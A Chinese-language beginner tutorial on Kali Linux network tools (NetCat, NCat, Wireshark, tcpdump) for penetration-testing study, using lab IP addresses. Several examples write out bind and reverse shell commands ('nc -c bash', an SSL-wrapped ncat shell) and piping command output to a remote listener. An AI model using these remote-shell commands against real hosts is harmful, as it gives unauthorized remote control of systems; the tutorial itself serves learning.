---

这里只是起跑线而不是终点线。
本文以 kali-linux-2022.3-vmware-amd64 为例。

1：基本工具

1.1：NetCat

NetCat（又称为 " nc "）被广泛用于计算机网络之间的数据传输和网络调试。允许用户通过 TCP 或 UDP 协议发送和接收数据。

功能描述：

• 网络工具中的瑞士军刀
• 侦听模式/传输模式
• 传输文本信息
• 传输文件/目录
• 远程控制/木马
• 流媒体服务器
• 远程克隆硬盘

NC 缺乏加密和身份验证的能力

不同系统或平台的 NetCat 命令不尽相同。

1.1.1：命令参数

基本语法：
nc [选项]

常用选项：

参数	说明	例
-h	显示帮助信息和参数选项。	nc -h
-l	监听模式，等待连接请求到达指定的端口。	nc -l 5555 详见示例01
-p 端口	指定要使用的端口号。
-v	显示详细的输出信息。	nc -v baidu.com 80
-n	使用 IP 地址时不进行 DNS 反向解析。	nc -n 1.1.1.20 5555
-q 数字	指定连接建立或数据传输时的等待时间（单位：秒）。	详见示例02
-z	端口扫描，默认使用 TCP 协议，无需建立实际连接。可指定端口范围。
-u	指定使用 UDP 协议进行数据传输。
-c 命令或shell	执行命令。可用于远程控制。	详见示例06、07

常用组合：

参数组合	说明	例
-nv	主要用于建立连接	nc -nv 1.1.1.20 3333
-nvz	TCP 端口扫描	nc -nvz 1.1.1.20 1-65535
-nvzu	UDP 端口扫描	nc -nvzu 1.1.1.20 1-1024

1.1.2：示例

• 示例01：⽂本信息传输。

操作：

先在一台主机上开启端口监听，再使用另一台主机连接。即可通信。

一、ubuntu（1.1.1.20）：
nc -l [-p] 3333
二、kali（1.1.1.10）：
nc -nv 1.1.1.20 3333

结果：

• 示例02：监听信息并保存。

操作：

一、kali（1.1.1.10）：
nc -l [-p] 3333 > ps.txt
二、ubuntu（1.1.1.20）：
ps aux | nc -nv 1.1.1.10 3333 -q 1

结果：

在 ubuntu 执行 ps aux 的结果会被保存在 kali 上的 ps.txt 。且完成后一秒自动断开连接。

• 示例03：主动传输文件。

操作：

一、kali（1.1.1.10）：
nc -l 3333 > 1.txt
二、ubuntu（1.1.1.20）：
nc -nv 1.1.1.10 3333 < 2.txt -q 1

结果：

ubuntu 上的 2.txt 文件传输到 kali 并被保存为 1.txt 。

• 示例04：被动接收文件。

操作：

一、kali（1.1.1.10）：
nc -q 1 -l 3333 < 1.txt
二、ubuntu（1.1.1.20）：
nc -nv 1.1.1.10 3333 > 2.txt

结果：

kali 上的 1.txt 文件被 ubuntu 接收并被保存为 2.txt 。

• 示例05：目录传输。

操作：

一、ubuntu（1.1.1.20）：
tar -cvf - /test/ | nc -lp 3333 -q 1
二、kali（1.1.1.10）：
nc -nv 1.1.1.20 333 | tar -xvf -

结果：

ubuntu 上的 /test/ 目录传输到 kali 上。

• 示例06：远程控制（被动连接）。

操作：

一、ubuntu（1.1.1.20）：
nc -lp 3333 -c bash
二、kali（1.1.1.10）：
nc 1.1.1.20 3333

结果：

ubuntu 被 kali 连接，kali 可远程执行 linux 命令。

注：Windows 用户可以把 bash 改成 cmd 。

• 示例07：远程控制（主动连接）。

操作：

一、kali（1.1.1.10）：
nc -lp 3333
二、ubuntu（1.1.1.20）：
nc 1.1.1.10 3333 -c bash

结果：

ubuntu 主动连接 kali，kali 可远程执行 linux 命令。

1.2：NCat

NCat是 Nmap 网络扫描器项目的一部分。可以视为 NetCat 工具的加强版。许多命令都与 NetCat 一致。

功能描述：

• 支持 SSL 和 TLS 加密协议。
• 支持身份验证，包括基于用户名和密码的身份验证。

1.2.1：命令参数

基本语法：
ncat [选项]

常用选项：

NCat许多命令都与 NetCat 一致。这里只列出特别的参数。

参数	说明	例
--allow	访问控制。限制允许连接的 IP 地址范围。	详见示例01
--ssl	使用SSL/TLS加密连接。	详见示例01

1.2.2：示例

• 示例01：

操作：

一、ubuntu（1.1.1.20）：
ncat -c bash --allow 1.1.1.10 -vnl 3333 --ssl
二、kali（1.1.1.10）：
ncat -nv 1.1.1.20 3333 --ssl

结果：

ubuntu 允许来自 IP 地址为 1.1.1.10 的主机连接。连接建立后执行 Bash 命令，并使用 SSL/TLS 加密进行连接。

1.3：WireShark

WireShark 是一款开源抓包软件，常用来检测网络问题、攻击溯源、或者分析底层通信机制（抓包嗅探、协议分析。）

基本使用方法：

这里只介绍大致过程。具体细节网络教学很多。

• 启动
• 选择抓包网卡
• 实时抓包
• 保存或分析捕获文件
• 首选项配置（添加展示信息，调整喜好的展示格式等）

筛选器：
用于过滤数据包。

• 抓包筛选器
• 显示筛选器

常见协议包：
需要熟悉常见协议数据包的分层结构。

数据流：
有时一个请求涉及多个包，一个一个查看很麻烦。这时追踪数据流可以方便查看涉及到的数据包信息。（追踪流）

信息统计：
WireShark 提供了一些信息统计功能。

• 节点数
• 协议分布
• 包大小分布
• 会话连接
• 解码方式
• 专家系统

1.4：TCPdump

TCPdump 是一款命令行抓包分析工具。Linux、Unix 系统默认安装。

1.4.1：命令参数

基本语法：
tcpdump [选项]

常用选项：

参数	说明	例
-i 网络接口	指定要监听的网络接口。	tcpdump -i eth0 详见示例01
-s 数字	指定捕获数据包的最大长度（单位：字节。0 表示抓取所有）。默认为 64。	tcpdump -s 100 详见示例02
-w 文件	将捕获的数据包写入文件。	tcpdump -w test.pcap 详见示例02
-r 文件	从文件中读取数据包进行分析。	tcpdump -r test.pcap 详见示例05、06、07
-A	以 ASCII 形式显示数据包内容。
-X	以十六进制和 ASCII 形式显示数据包内容。	详见示例06
-v[v][v]	显示详细信息，“ v ” 越多越详细。
-n	显示 IP 地址和端口号，不进行 DNS 解析。	详见示例05、06
src host ip地址	过滤条件。指定源主机。	详见示例04、05
dst host ip地址	过滤条件。指定目的主机。
port 端口	过滤条件。指定端口。	详见示例06、07
tcp	过滤条件。指定 TCP 协议。	tcpdump tcp 详见示例07
udp	过滤条件。指定 UDP 协议。

过滤条件可用 “ or ” 和 “ and ” 连接。

除了以上基础筛选过滤条件之外，TCPdump 还提供了高级筛选：

示例：

tcpdump -A -n 'tcp[13] = 24' -r http.cap

1.4.2：示例

• 示例01：开启抓包

操作：

tcpdump -i eth0

结果：

• 示例02：抓取数据包所有内容，并保存在 test.pcap 文件

tcpdump -i eth0 -s 0 -w test.pcap

• 示例03：查看抓包文件摘要信息

tcpdump -r test.pcap

• 示例04：抓取指定源地址的数据包

tcpdump src host 192.168.0.1 or src host 192.168.0.2

• 示例05：查看抓包文件中指定源地址的信息。

tcpdump -n src host 145.254.160.237 -r test.pcap

• 示例06：查看抓包文件中指定端口的信息，并以十六进制和 ASCII 形式显示数据包内容。

tcpdump -nX port 53 -r test.pcap

• 示例07：查看抓包文件中指定 tcp 端口的信息。

tcpdump tcp port 53 -r test.pcap

2：其他

渗透测试中有时需要团队资源共享，因此需要一些软件来协助团队合作。
包括但不限于以下两点：

• 数据文件共享

可以选择合适的软件以便于交换已获得的信息。

• 重要数据加密

选择合适的软件对重要的数据文件（如获得的漏洞信息等）加密存储。以免泄露造成损失。

---

落花有意随流水，流水无心恋落花。

——《警世通言》（明）冯梦龙